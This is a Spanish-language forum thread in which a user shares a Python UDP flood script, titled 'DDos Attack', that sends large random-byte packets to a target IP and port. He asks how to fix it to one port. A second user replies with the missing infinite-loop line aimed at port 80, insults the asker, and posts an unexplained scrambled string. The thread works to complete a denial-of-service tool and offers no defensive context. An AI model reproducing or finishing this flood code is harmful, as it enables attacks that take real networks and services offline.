Autor
|
Tema: como establesco un puerto en especifico? (Leído 2,409 veces)
|
Julio0
Desconectado
Mensajes: 8
|
#este es el código que tengo hasta ahora pero manda los packetes a muchos puertos indefinidamente yo solo quiero que lo mande a uno en espesifico esto me esta sacando de quicio.
#!/usr/bin/env python # coding=utf-8 import os, sys import time import socket import random #host && Port target_host = raw_input("IP Target :") target_port = input("Port :") #packet sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(65500) sock.sendto(bytes, (target_host, target_port)) os.system("clear") os.system("figlet DDos Attack") #conexion_client sent = 1 pysendfile = 0 while True:
print(sock, target_host, target_port)
|
|
|
En línea
|
|
|
|
@XSStringManolo
Hacker/Programador
Colaborador
Desconectado
Mensajes: 2.399
Turn off the red ligth
|
Si haces copia y pega al menos pon todo el codigo, la fuente y entre etiquetas. Se nota que faltan variables etc.
port = 80 while True: sock.sendto(bytes, (ip,port))
No tiene más. No seas lamer.
DbhapsLeV634lyh cZiXfyrñaxd8oqcveJ sHa2rwdAeHuWnzaZvXu Sewldtja/ailAaHs2lqe ctjrCatsATCmAHm0ZTCmcDCxAYK nbXxhfTCtATCxc36mJICwdjCicHgEvn5 hcHGlczCaZ 4KqdIRhb3mlAHmmJHymJHSwfTCubYN hAHmmd3WaMjCUc4KzfTCxc4JhAXxhZ3 /EtXG7czClAXxhAHWaZ3mn dnGlczxhcYWkbDCtc3AmMh== Si descifras este msg puto crack.
|
|
« Última modificación: 2 Junio 2019, 08:20 am por string Manolo »
|
En línea
|
Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖
|
|
|
|
|